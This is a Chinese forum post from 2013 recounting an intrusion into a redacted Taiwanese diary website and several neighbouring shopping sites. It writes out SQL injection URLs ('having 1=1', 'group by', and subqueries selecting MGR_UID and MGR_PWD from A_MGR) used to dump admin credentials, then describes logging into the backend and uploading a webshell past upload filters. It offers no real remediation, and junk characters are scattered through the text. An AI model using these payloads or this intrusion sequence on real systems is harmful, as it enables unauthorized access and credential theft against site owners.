发现一个注入点( X% x8 T2 a8 v7 P5 h7 U, H
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
) F& t: W0 D6 w2 L# ^- M9 L" g) J- w3 R# C/ U
习惯性的加’having1=1--. `) `" W* N0 ]9 d
1 ^: h+ Z/ R e8 y/ n4 H, {
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—- S4 [+ V- m3 v
2 C) {) a# c/ J. S1 @7 S$ f0
0 G9 I4 K# q I, }/ m5 O* A2 H- b$ N8 k7 d8 V" t4 B
爆出Diary_A.dl_Title(这时候很激动啊)
% a6 V$ l! z; I) P# O' D: b, l" n4 `5 X
那么继续+ U: G1 E; f" h% ]& h, M/ r1 x8 [ C
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—3 s$ P7 p# n" C
! x. C( N, {0 R8 R1 | o: ]/ b继续,一直爆下去
3 a, q8 T& v) X7 o, l) Z. S2 D1 \1 M$ ]. K: R& k7 i1 e _+ f1 p
爆到几个字段和表段 但是没找到需要的管理用户的字段- E2 N8 V" ]! \& L2 u7 r
- l0 l% n6 U' Q, j K R蛋疼了 怎么办 然后去后台登陆页看源码8 q6 I# K8 O. S5 e9 ]9 Z
7 r1 O! f" z) @9 z; {. G
0
4 T7 @7 _# _: `) `* j3 [! j6 M4 h5 i
Input name= “ADUID”1 H6 A6 t0 |7 j; c- s
Input name= “ADPWD”! d- Q6 |; ?5 I/ w0 h, Y* G" S
1 O3 o# @% I: b% u, z4 W很幸运 找到了字段那就继续
! H4 N9 y' B! N. B: K' j0 N- l找到之后开始爆用户
4 s5 A+ t5 s5 X+ B% X+ V7 g G4 ohttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0— N" X. ^# z5 k9 x
爆密码0 [ S" O$ \# {: l4 a( w
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
/ i1 l0 k) ]( n; s1 Q6 h) L测试了下 这个注入点只能爆到文章哪里的表
* S, j/ {8 n: Q, g! Y8 J
( e# I2 `/ }0 Y" W2 ?( G头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
7 I. W2 c1 z# z. m
" o6 l0 y6 t) I" e! R; P又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了: p% f1 |* }! S" b
7 r5 d1 }7 w/ ]) W3 H( Y+ M. E
473" a8 U1 j: ]% k) k! C; n$ t8 R
7 m: T8 s* p' D; P1 J7 l进后台
9 D% Y$ M) Z3 z$ e m; Z# e" o( l& L) X+ h& S' k
% u T. ]! X8 i发现几个上传点 有的地方不能上传 而且防止恶意代码
$ C( o7 T# J | B6 h. H; J
* k2 H: ~4 \; r没办法 各种百度各种找大牛 找到一只好像可以突破的马
0 I, |8 J" j. `6 W# x, @
4 _1 d2 C( I$ E
& n6 N- @4 L. b/ M在系统管理那里直接上传 不过没有显示地址6 M4 j" X* ?- M
! ]. j' J# N( f( l5 N! O
再上传一次 抓包 搞定OK6 m% Z' o+ l. n
. e- X; r" ^" x5 R
, n- C2 Y, n3 v5 P, }2 l5 A" B! l5 d3 u
472
! X' ^7 s7 F* d0 L4 `
! L! h0 K( S5 G. R* ?8 @晚上不行了 去睡觉。。。. O. w; T: U% `$ k$ u2 \) N# Z
第二天刚起床 闲的没事做继续日站吧 + M8 o, s' N, ^: O- u% f
2 ~# Q3 Z& Q9 q' a6 b找个站 就把这个站的旁c扫了下
; i( H8 w* d, f0 G1 Y: @6 y* z* M$ e2 K. b
发现c段也有一个购物站 ,然后还和这个站的模板差不多
8 w5 j, F+ h- K, j) Z& a8 ^+ p+ `5 s' n, m' \! Z- T
就找到会员登录口测试2 M6 `4 x# g/ E% _3 K- B
+ J% N6 `' k" N1 g3 l1 p
'and (select top 1 MGR_UID from A_MGR)>0—
2 f2 Q* C2 a! ^% f3 L$ {果断爆到了 这时候我很激动 通杀0 F: }; E+ q, W8 B( T7 ]$ k) j
5 t9 O3 `! N7 Q) S4 z3 W再次翻c段
: }# m# q- O1 |, J+ y& w
$ W% `. U% c8 h- d1 H翻出几个站 都成功拿下3 u1 }& r; C# l* g0 i- R
+ Z% q5 [. D; ]/ X' y& P- t
3 X) d, m( w! L2 x# C0 h0 p2 s
/ ?! _& a3 }0 v. v修复方案:
1 i% r' R" }+ B8 \9 @( y他们比我专业 9 o, q2 {: h3 J; A
2 o' ~ p8 F3 v+ e1 }+ k
% ^& W, x+ g h5 t) F$ l4 R- N6 B4 x1 N! a9 Y8 v9 X$ N
|
发表于 2013-4-4 17:40:38
收藏
支持
反对